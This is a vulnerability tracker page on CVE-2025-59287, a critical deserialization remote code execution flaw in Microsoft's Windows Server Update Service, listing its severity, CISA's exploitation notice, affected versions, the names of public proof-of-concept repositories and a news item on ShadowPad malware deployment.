Remote Code Execution Vulnerability in Windows Server Update Service by Microsoft
CVE-2025-59287

9.8CRITICAL

Key Information:

Vendor: Microsoft
Status: Windows Server 2019; Windows Server 2019 (server Core Installation); Windows Server 2022; Windows Server 2025 (server Core Installation)
Vendor: CVE Published:; 14 October 2025

Badges

🔥 Trending now🥇 Trended No. 1📈 Trended📈 Score: 39,200💰 Ransomware👾 Exploit Exists🟡 Public PoC🟣 EPSS 60%🦅 CISA Reported📰 News Worthy

What is CVE-2025-59287?

CVE-2025-59287 is a critical remote code execution vulnerability found in the Windows Server Update Service (WSUS) developed by Microsoft. WSUS is a vital component for managing the distribution of updates that are released through Microsoft Update to computers in a corporate environment. This vulnerability arises from the deserialization of untrusted data, which allows unauthorized attackers to execute arbitrary code remotely over a network. Exploiting this flaw could lead to a complete compromise of affected systems, severely undermining an organization’s security posture and operational integrity.

This vulnerability's technical underpinnings highlight a systemic weakness that can be leveraged by malicious actors, especially in environments where WSUS is a central component of IT infrastructure management. Organizations using WSUS for patch management are uniquely at risk, as successful exploitation can enable attackers to manipulate the update process, potentially installing malicious updates or taking control of target systems.

Potential impact of CVE-2025-59287

Unauthorized System Access: The ability for an attacker to execute code remotely means they can gain unauthorized access to sensitive systems and data. This could lead to further exploitation within the network, allowing for lateral movement to other critical assets.
Data Breaches and Loss: Once an attacker has control, they can exfiltrate confidential information, leading to severe data breaches. This impact can be detrimental to an organization’s reputation, customer trust, and financial status.
Disruption of Operations: The exploitation of this vulnerability could result in significant disruption, where attackers may execute attacks designed to disable or impair services. Such disruptions can lead to operational paralysis, affecting productivity and potentially leading to financial losses due to downtime.

CISA has reported CVE-2025-59287

CISA provides regional cyber and physical services to support security and resilience across the United States. CISA monitor the most dangerious vulnerabilities and have identifed CVE-2025-59287 as being exploited but is not known by the CISA to be used in ransomware campaigns. This is subject to change at pace as recent news articles suggest the vulnerability is being used by ransomware groups.

The CISA's recommendation is: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.

Affected Version(s)

Windows Server 2012 (Server Core installation) x64-based Systems 6.2.9200.0 < 6.2.9200.25728

Windows Server 2012 R2 (Server Core installation) x64-based Systems 6.3.9600.0 < 6.3.9600.22826

Windows Server 2012 R2 x64-based Systems 6.3.9600.0 < 6.3.9600.22826

Exploit Proof of Concept (PoC)

PoC code is written by security researchers to demonstrate the vulnerability can be exploited. PoC code is also a key component for weaponization which could lead to ransomware.

CVE-2025-59287
Created by jiansiting

Find-WSUS
Created by mubix

CVE-2025-59287-When-your-patch-server-becomes-the-attack-vector
Created by AdityaBhatt3010

News Articles

Red Hot Cyber

CVE-2025-59287

Windows Server Vulnerability Exploited: ShadowPad Malware Deployed

CVE-2025-59287 vulnerability in Windows Server Update Services exploited to deploy ShadowPad malware. Learn how attackers used this flaw to gain access.

18 hours ago